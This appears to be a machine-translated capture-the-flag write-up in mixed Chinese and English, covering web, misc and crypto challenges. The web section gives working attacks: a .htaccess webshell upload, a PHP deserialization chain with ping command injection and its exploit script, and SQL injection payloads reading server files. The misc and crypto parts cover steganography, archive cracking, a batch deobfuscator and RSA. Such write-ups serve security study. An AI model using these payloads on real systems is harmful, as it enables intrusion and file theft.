WEB

upload_new

A bunch of tests can only be submittedjpg而且对<?also tested,Pony can be constructed

The upload error is yesApache可以想到用.htaccess来执行php木马

用bp来修改类型

Change the image type again

用蚁剑连接

得到flag

POP

代码审计

<?php 
  function filter($string) {    //filter函数过滤,Usually character escapes,如果我们用的是flag,就是flag替换成nonono字符增多
  $safe = array('system','fopen','fread','file_get_contents','flag'); 
  $safe = '/' . implode('|', $safe) . '/i'; 
  return preg_replace($safe, 'nonono', $string); 
}

class PingUtils{ 
  function __call($name,$args){ 
    system("ping -c4 ${args[0]}");    //This should be our exploit point exploitping命令cat flagUsually it is structure127.0.0.1 || cat /flag
  } 
}
class Cindy{ 
  var $someone;     //In this class there are variables that we can controlsomeone  phone 可以改为127.0.0.1
  var $phone; 
  function call(){ 
    $this->phone->call($this->someone); 
  } 
}
class Bob{   to keep in this classflag=True
  public $flag=True; 
  public function __get($a){ 
    if($this->flag){ 
      $cindy = new Cindy(); 
      $cindy->someone = $_REQUEST['someone']; 
      $cindy->phone = "p50";   //确定了phone的属性了,So we can't directly control it,So the target of escape becomessomeone
      #var_dump(filter(serialize($cindy))); 
      $cindy = unserialize(filter(serialize($cindy))); 
      $cindy->call($someone); 
    }else{
      echo 'nonono'; 
    } 
  }
  public function __wakeup(){ 
    $this->flag = False;   //We're going to bypass thiswakeup,不能让flag=False否则get函数无法执行
  } 
} 
class Alice{ 
  public function __destruct(){ 
    echo $this->c->b; 
  } 
}
highlight_file(__FILE__); 
@unserialize($_GET['pop']);

http://127.0.0.1/2.php?pop=O:5:%22Alice%22:1:{s:1:%22c%22;O:3:%22Bob%22:2:{s:4:%22flag%22;b:1;}}&someone=flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagfopen|ls%22;s:5:%22phone%22;O:9:%22PingUtils%22:0:{}} ls /

看到flag flag名字用f???绕过 最后payload

http://127.0.0.1/2.php?pop=O:5:%22Alice%22:1:{s:1:%22c%22;O:3:%22Bob%22:2:{s:4:%22flag%22;b:1;}}&someone=flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagfopen|ls%22;s:5:%22phone%22;O:9:%22PingUtils%22:0:{}} ls /

<?php
function filter($string) {
    $safe = array('system','fopen','fread','file_get_contents','flag');
    $safe = '/' . implode('|', $safe) . '/i';
    return preg_replace($safe, 'nonono', $string);
}
class Cindy{
    var $someone;
    var $phone;
    function call(){
        $this->phone->call($this->someone);
    }
}
class PingUtils{
    function __call($name,$args){
        system("ping -c4 ${args[0]}");
    }
}
$a = new Cindy();
$b = new PingUtils();
$a -> someone = '127.0.0.1;cat /flag';

官方exp

#!/usr/bin/python3 
# -*- coding: utf-8 -*- 
import re 
import sys 
import requests as r 
# Input is the target machine IP and port and what to verify flag 
HOST = sys.argv[1] 
PORT = sys.argv[2] 
FLAG = sys.argv[3] 
def exp(ip,port): 
    url = f"http://{ip}:{port}" 
    pop = 'O:5:"Alice":1:{s:1:"c";O:3:"Bob":0:{};N;}' 
    payload = '";s:5:"phone";O:9:"PingUtils":0:{}}' 
    someone = '127.0.0.1;cat /f\lag;#' + 'fopen'*len(payload) + payload 
    payload = '";s:5:"phone";O:9:"PingUtils":0:{}}' 
    someone = '127.0.0.1;cat /f\lag;#' + 'fopen'*len(payload) + payload 
    res = r.post(f"{url}/?pop={pop}",data={"someone":someone}) 
    match_group = re.findall("flag{(.*?)}", res.text) 
    flag = match_group[0] 
    return flag 
# 主逻辑 
if __name__ == '__main__': 
    flag = exp(HOST, PORT) 
    # 比较得出的 flag 是否是想要的 flag 
    print(flag) 
    assert flag == FLAG 
    print("Pass!") 
print(res.text)

SQL

双写绕过

获取路径

1.

payload: http://27.0.166.76:39782/index.php?id=-1' or 1=2 union selselectect

1,fllllag,3 from fl4g-- -

读取文件

1. 读取 /var/www/html/flag.php

2.

payload： http://27.0.166.76:39782/index.php?id=-1' or 1=2 union selselectect

1,load_file("/var/www/html/flag.php"),3 -- -

3. 右键查看源代码.获取flag

MISC

Welcome_to_QGB

直接base64

包上flag即可flag{Welcome_to_QGB}

大佬大佬

The subject is onepng图片,先用zsteg梭一下

发现一张png,separate him

The title prompts to change the size,Will his high revision

得到flag

The fun picture

The title is an encrypted compressed package,直接爆破

密码为6yOK,解压后得到三个文件

查看flag.txt

提示flag为图片,把他放到010There is no prefix in ,添加上%png

得到一张二维码,Scan to a stringbase64

解密得到flag

找找GIF

The topic has three files,但用winrar打开时aaa有密码,但用360Compression is gone(不知道为啥)

其中aaaThere is no suffix to put him in010中查看

发现是png,将后缀改为png查看,Felt less than half

修改高度

Just turn him backbbb.zip的密码,to get one without the suffixbbb文件,放到010There is no file header in ,但最后是00 3b

猜测是gif文件,Add the file header

得到一个gif可以看到flag闪过,screenshot to getflag

[email protected]

What a weird file?We intercepted from a hacker's computer,Can you help analyze it?(注意:FLAG是uuid格式,It's normal to restart when debugging,Note the title output)

一个被加密的bat文件 搜索batThe garbled code is decrypted to get a usedocOpen the decrypted method

Then continue to search for features 找到这篇文章

还原BatchEncryption(201610版本)Obfuscated batch file

还原BatchEncryption(201610版本)Obfuscated batch file_AEmmett's blog-CSDN博客_batchencryption解密

Use the script provided here 稍微修改 将

::BatchEncryption Build 201610 By [email protected]\r\n 

This judgment is deleted Decrypt the source file that reports the error directly

#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Batch Decryption 202009 (BatchEncryption Build 201610)
#

import os


def decryption(data):
    if not (data[0] == 0xFF and data[1] == 0xFE):
        print('Batch decryption bom error!')
        return
    if str(data[2:9], encoding="utf-8") != ' &cls\r\n':
        print('Batch decryption cls error!')
        return

    vars = {}

    # decryption line
    i = 60
    l = len(data)
    while i < l:
        i = run(vars, data, i)


def run(vars, data, i):
    buf = ''
    f = 0
    t = 0
    x = False
    l = len(data)
    while(True):
        if data[i] == 0x0d and data[i+1] == 0x0a:
            i += 2
            break
        # get %var:~x,y% %0
        if data[i] == 0x25:
            if not x:
                x = True
                f = i
            else:
                x = False
                t = i
                rst = var_percent(data[f:t+1], vars)
                buf += rst
        else:
            if not x:
                buf += str(data[i:i+1], encoding="utf-8")
            else:
                if (f + 1 == i) and ((data[i] >= 0x30 and data[i] <= 0x39) or data[i] == 0x2a):
                    x = False
                    t = i
                    rst = str(data[f:t+1], encoding="utf-8")
                    buf += rst
        i += 1
        if i >= l:
            break
    #
    print(buf)
    bufs = buf.split('&@')
    for var in bufs:
        if var[0:4] == 'set ':
            var = var[4:]
            b = var.find('=')
            vars[var[0:b]] = var[b+1:].replace('^^^', '^')

    return i


def var_percent(data, vars):
    full = str(data, encoding="utf-8")
    buf = full[1:len(full)-1]
    buf = buf.split(':~')
    var = buf[0]
    if not var in vars:
        vars[var] = os.getenv(var)
    ent = vars[var]
    if (len(buf) > 1):
        l = len(ent)
        buf = buf[1].split(',')
        f = int(buf[0])
        t = int(buf[1])
        if f < 0:
            f, t = l + f, t
        rst = ent[f: f+t]
    else:
        rst = full
    return rst


encrypt_file = './[email protected]'

if __name__ == '__main__':

    try:
        file = open(encrypt_file, "rb")
        data = file.read()
    except Exception as err:
        print('Batch decryption read error:', err)
        exit
    else:
        file.close()

    decryption(data)

运行得到flag

flag{156b404a-6bc8-4bf7-8121-a133795e4edd}

Crypto

babyRSA

基本的rsa公式

import gmpy2 as gp
import binascii
p =  122661900225958537473593999629721155547445152508344628379156151659796333424765145214036218314036538367449542188442412001233407797975924025535192193558685614179856037200129145911423039793961531441773477698026833665056111228506730246279582720435235709543855376031268946650792983451355568301885456994665262875749
q =  152724789318100477389853045726902882371493936383383619555088124064539207319241990180547432685312774553372809313491471789726609450644068056661970298474939384495232219405764685450242448624149384201199927977364779992607712253080589100019883370160068766123718298014862011278111513825917110130106578782458953059859
e =  33
c =  11852026632281701016724299626853609925180998208455660311000462227020929333377781887963495074427303581997467868526563174560178272022772274396432682692794063165224973938499915472777760940556428251371134510052503881386517887007288504116932135535735038891342756359104150065602002052735935730495500714873277911540993054971564663909394753577934282562474400064427000243598933915050367444422905464938144621404295662232927161154426321727883942392656517143955794390377418120483810457172329736269488772672472120992463072392783584779323287481047740952196227038157414187174528649660615317679662848063671637919176651288177629770199
n = p*q
phi = (p-1) * (q-1)
d = gp.invert(e, phi)
m = pow(c, d, n)
print(m)

得到

621705382104866156546935593390435525320795645461697933164154189039655097974493239721747686929741415975229964611798557062065834464781726955133063049051993398215120634674474750860776295024520795799504015222397

将他转16进制

7beee48d0f44b72d5339c5117463133814bb5ba5ad2fdb13a2da3eaeab17a20408575542981c267a5f165c32df842d1f666c61677b32363061396137333833616664356663393739333566326332643464366662667d

再转hex得到flag